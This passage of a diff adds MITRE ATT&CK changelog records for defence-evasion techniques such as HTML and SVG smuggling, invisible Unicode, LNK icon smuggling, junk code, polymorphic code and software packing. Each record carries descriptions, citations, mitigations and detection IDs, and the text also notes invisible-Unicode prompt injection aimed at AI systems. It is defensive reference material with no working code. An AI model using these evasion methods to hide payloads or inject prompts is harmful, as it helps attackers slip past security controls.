+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.619000+00:00\", \"old_value\": \"2026-04-15 22:18:39.119000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0344: Detection Strategy for Fileless Storage via Registry, WMI, and Shared Memory"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-05-20 12:20:42.219000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "HTML Smuggling",
+                    "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/006",
+                            "external_id": "T1027.006"
+                        },
+                        {
+                            "source_name": "Outlflank HTML Smuggling 2018",
+                            "description": "Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.",
+                            "url": "https://outflank.nl/blog/2018/08/14/html-smuggling-explained/"
+                        },
+                        {
+                            "source_name": "MSTIC NOBELIUM May 2021",
+                            "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.",
+                            "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"
+                        },
+                        {
+                            "source_name": "HTML Smuggling Menlo Security 2020",
+                            "description": "Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.",
+                            "url": "https://www.menlosecurity.com/blog/new-attack-alert-duri"
+                        },
+                        {
+                            "source_name": "nccgroup Smuggling HTA 2017",
+                            "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved September 12, 2024.",
+                            "url": "https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jonathan Boucher, @crash_wave, Bank of Canada",
+                        "Krishnan Subramanian, @krish203",
+                        "Stan Hegt, Outflank",
+                        "Vinay Pidathala"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-15 22:19:27.839000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1048: Application Isolation and Sandboxing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0313: Detection Strategy for HTML Smuggling via JavaScript Blob + Dynamic File Drop"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-19 21:27:32.820000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Indicator Removal from Tools",
+                    "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/005",
+                            "external_id": "T1027.005"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2026-04-15 22:19:28.558000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0189: Detection Strategy for Indicator Removal from Tools - Post-AV Evasion Modification"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e9b75bb0-b5ec-42c8-b728-f4f424d9c39e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 19:18:41.169000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Invisible Unicode",
+                    "description": "Adversaries may abuse invisible or non-printing Unicode characters to conceal malicious content within files, scripts, or text. By inserting characters that do not visibly render, adversaries may hide data, alter how content is interpreted, or make malicious code appear as benign text or whitespace. Adversaries may encode these malicious payloads, using binary, Base64, or custom schemes, to be reconstructed at runtime through scripting features such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) Proxy traps, `eval()`, or other dynamic execution methods. This technique enables adversaries to evade visual inspection and basic static analysis by hiding malicious encoded content in innocuous text.(Citation: PUAs Unicode - Eriksen)(Citation: Tycoon2FA - Unicode)(Citation: Unicode - Veracode) \n\nUnicode is a standardized character encoding model that assigns a unique numerical value, known as a code point, to every character across writing systems, enabling consistent text representation across platforms, applications, and languages. Code points are represented as `U+` followed by a hexadecimal value and may be encoded using formats such as `UTF-8` or `UTF-16`. Adversaries may abuse the valid code points in Unicode that are not visibly rendered but still take up bytes, such as zero-width spaces, variation selectors, or bidirectional formatting controls, to conceal malicious payloads.(Citation: Tycoon2FA - Unicode)(Citation: GlassWorm - Unicode)(Citation: Unicode and Hidden Prompts - Perets)\n\nAdversaries may additionally exploit Private Use Area (PUA) characters, a range of code points reserved for custom assignment. PUA characters that are not defined by a font or application are typically rendered blank.(Citation: PUAs Unicode - Eriksen)\n\nUnicode characters may also be leveraged in support of other techniques such as [Phishing](https://attack.mitre.org/techniques/T1660), [Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002), or [User Execution](https://attack.mitre.org/techniques/T1204). For example, some adversaries may embed artificial intelligence (AI) prompt injections using invisible Unicode characters in emails or documents that appear benign when processed by AI systems.(Citation: LLMs and Unicode - Medium)(Citation: Invisible Prompt Injection - Trend Micro)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/018",
+                            "external_id": "T1027.018"
+                        },
+                        {
+                            "source_name": "GlassWorm - Unicode",
+                            "description": " Idan Dardikman. (2025, October 18). GlassWorm: First Self-Propagating Worm Using Invisible Code Hits OpenVSX Marketplace. Retrieved April 21, 2026.",
+                            "url": "https://www.koi.ai/blog/glassworm-first-self-propagating-worm-using-invisible-code-hits-openvsx-marketplace#heading-5"
+                        },
+                        {
+                            "source_name": "PUAs Unicode - Eriksen",
+                            "description": "Charlie Eriksen. (2025, May 13). You're Invited: Delivering malware via Google Calendar invites and PUAs. Retrieved April 21, 2026.",
+                            "url": "https://www.aikido.dev/blog/youre-invited-delivering-malware-via-google-calendar-invites-and-puas"
+                        },
+                        {
+                            "source_name": "Invisible Prompt Injection - Trend Micro",
+                            "description": "Ian Ch Lui. (2025, January 22). Invisible Prompt Injection: A Threat to AI Security. Retrieved April 21, 2026.",
+                            "url": "https://www.trendmicro.com/en_us/research/25/a/invisible-prompt-injection-secure-ai.html"
+                        },
+                        {
+                            "source_name": "LLMs and Unicode - Medium",
+                            "description": "Idan Habler. (2025, September 12). Hiding in Plain Sight: Weaponizing Invisible Unicode to Attack LLMs. Retrieved April 21, 2026.",
+                            "url": "https://idanhabler.medium.com/hiding-in-plain-sight-weaponizing-invisible-unicode-to-attack-llms-f9033865ec10"
+                        },
+                        {
+                            "source_name": "Tycoon2FA - Unicode",
+                            "description": "Rodel Mendrez. (2025, April 10). Tycoon2FA New Evasion Technique for 2025. Retrieved April 21, 2026.",
+                            "url": "https://www.levelblue.com/blogs/spiderlabs-blog/tycoon2fa-new-evasion-technique-for-2025"
+                        },
+                        {
+                            "source_name": "Unicode and Hidden Prompts - Perets",
+                            "description": "Shaked Perets. (2025, December 7). Invisible Code & Hidden Prompts \u2013 How Attackers Weaponize Unicode in Repos (and How SAST Can Help). Retrieved April 21, 2026.",
+                            "url": "https://cycode.com/blog/invisible-code-hidden-prompts-unicode-attacks-sast/"
+                        },
+                        {
+                            "source_name": "Unicode - Veracode",
+                            "description": "Veracode Threat Research. (2025, June 9). Down the Rabbit Hole of Unicode Obfuscation. Retrieved April 21, 2026.",
+                            "url": "https://www.veracode.com/blog/down-the-rabbit-hole-of-unicode-obfuscation/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Menachem Goldstein",
+                        "Rich Rafferty (NR Labs)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-23 18:41:48.689000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0920: Detection Strategy for Invisible Unicode"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--671cd17f-a765-48fd-adc4-dad1941b1ae3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-04 21:38:49.913000+00:00",
+                    "modified": "2026-05-12 15:12:00.639000+00:00",
+                    "name": "Junk Code Insertion",
+                    "description": "Adversaries may use junk code / dead code to obfuscate a malware\u2019s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with [Compression](https://attack.mitre.org/techniques/T1027/015) or [Software Packing](https://attack.mitre.org/techniques/T1027/002).(Citation: ReasonLabs)(Citation: ReasonLabs Cyberpedia Junk Code)\n\nNo-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly used as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them.(Citation: ReasonLabs)\n\nThe use of junk / dead code insertion is distinct from [Binary Padding](https://attack.mitre.org/techniques/T1027/001) because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware\u2019s signature.   ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/016",
+                            "external_id": "T1027.016"
+                        },
+                        {
+                            "source_name": "ReasonLabs",
+                            "description": "ReasonLabs. (n.d.). What is Dead code insertion?. Retrieved March 4, 2025.",
+                            "url": "https://cyberpedia.reasonlabs.com/EN/dead%20code%20insertion.html"
+                        },
+                        {
+                            "source_name": "ReasonLabs Cyberpedia Junk Code",
+                            "description": "What is Junk Code?. (n.d.). ReasonLabs. Retrieved April 4, 2025.",
+                            "url": "https://cyberpedia.reasonlabs.com/EN/junk%20code.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Joas Antonio dos Santos, @C0d3Cr4zy"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.639000+00:00\", \"old_value\": \"2026-04-15 22:19:48.489000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0322: Detection Strategy for Junk Code Obfuscation with Suspicious Execution Patterns"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-29 15:28:42.409000+00:00",
+                    "modified": "2026-05-12 15:12:00.690000+00:00",
+                    "name": "LNK Icon Smuggling",
+                    "description": "Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. \n\nAdversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)\n\nLNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. \n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/012",
+                            "external_id": "T1027.012"
+                        },
+                        {
+                            "source_name": "Unprotect Shortcut",
+                            "description": "Unprotect Project. (2019, March 18). Shortcut Hiding. Retrieved October 3, 2023.",
+                            "url": "https://unprotect.it/technique/shortcut-hiding/"
+                        },
+                        {
+                            "source_name": "Booby Trap Shortcut 2017",
+                            "description": "Weyne, F. (2017, April). Booby trap a shortcut with a backdoor. Retrieved October 3, 2023.",
+                            "url": "https://web.archive.org/web/20171225152553/https://www.uperesia.com/booby-trapped-shortcut"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Michael Raggi @aRtAGGI",
+                        "Andrew Northern, @ex_raritas",
+                        "Gregory Lesnewich, @greglesnewich"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.690000+00:00\", \"old_value\": \"2026-04-15 22:20:54.005000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0405: Detection Strategy for LNK Icon Smuggling"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-09-27 12:28:03.938000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Polymorphic Code",
+                    "description": "Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation: polymorphic-medium)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/014",
+                            "external_id": "T1027.014"
+                        },
+                        {
+                            "source_name": "polymorphic-blackberry",
+                            "description": "Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September 27, 2024.",
+                            "url": "https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware"
+                        },
+                        {
+                            "source_name": "polymorphic-sentinelone",
+                            "description": "SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples and Challenges. Retrieved September 27, 2024.",
+                            "url": "https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware"
+                        },
+                        {
+                            "source_name": "polymorphic-medium",
+                            "description": "Shellseekercyber. (2024, January 7). Explainer: Packed Malware. Retrieved September 27, 2024.",
+                            "url": "https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035"
+                        },
+                        {
+                            "source_name": "polymorphic-linkedin",
+                            "description": "Sherwin Akshay. (2024, May 28). Techniques for concealing malware and hindering analysis: Packing up and unpacking stuff. Retrieved September 27, 2024.",
+                            "url": "https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "TruKno",
+                        "Ye Yint Min Thu Htut, Active Defense Team, DBS Bank"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-15 22:20:58.199000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0324: Detection Strategy for Polymorphic Code Mutation and Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--78b9e70d-1605-459c-b23d-e3a25036968c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-25 15:31:09.697000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "SVG Smuggling",
+                    "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `<script>` tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files. \n\nSVG smuggling can take a number of forms. For example, threat actors may include content that: \n\n* Assembles malicious payloads(Citation: Talos SVG Smuggling 2022)\n* Downloads malicious payloads(Citation: Cofense SVG Smuggling 2024)\n* Redirects users to malicious websites(Citation: Bleeping Computer SVG Smuggling 2024)\n* Displays interactive content to users, such as fake login forms and download buttons.(Citation: Bleeping Computer SVG Smuggling 2024)\n\nSVG Smuggling may be used in conjunction with [HTML Smuggling](https://attack.mitre.org/techniques/T1027/006) where an SVG with a malicious payload is included inside an HTML file.(Citation: Talos SVG Smuggling 2022) SVGs may also be included in other types of documents, such as PDFs.  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/017",
+                            "external_id": "T1027.017"
+                        },
+                        {
+                            "source_name": "Talos SVG Smuggling 2022",
+                            "description": "Adam Katz and Jaeson Schultz. (2022, December 13). HTML smugglers turn to SVG images. Retrieved March 25, 2025.",
+                            "url": "https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/"
+                        },
+                        {
+                            "source_name": "Trustwave SVG Smuggling 2025",
+                            "description": "Bernard Bautista and Kevin Adriano. (2025, April 10). Pixel-Perfect Trap: The Surge of SVG-Borne Phishing Attacks. Retrieved April 14, 2025.",
+                            "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pixel-perfect-trap-the-surge-of-svg-borne-phishing-attacks/"
+                        },
+                        {
+                            "source_name": "Bleeping Computer SVG Smuggling 2024",
+                            "description": "Lawrence Abrams. (2024, November 17). Phishing emails increasingly use SVG attachments to evade detection. Retrieved March 25, 2025.",
+                            "url": "https://www.bleepingcomputer.com/news/security/phishing-emails-increasingly-use-svg-attachments-to-evade-detection/"
+                        },
+                        {
+                            "source_name": "Cofense SVG Smuggling 2024",
+                            "description": "Max Gannon. (2024, March 13). SVG Files Abused in Emerging Campaigns. Retrieved March 25, 2025.",
+                            "url": "https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dhiraj Mishra (@RandomDhiraj)",
+                        "Suraj Khetani (@r00treaver)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2026-04-15 22:22:02.298000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1048: Application Isolation and Sandboxing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0510: Detection Strategy for SVG Smuggling with Script Execution and Delivery Behavior"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-05 14:17:46.686000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Software Packing",
+                    "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1027/002",
+                            "external_id": "T1027.002"
+                        },
+                        {
+                            "source_name": "Awesome Executable Packing",
+                            "description": "Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.",
+                            "url": "https://github.com/dhondta/awesome-executable-packing"
+                        },
+                        {
+                            "source_name": "ESET FinFisher Jan 2018",
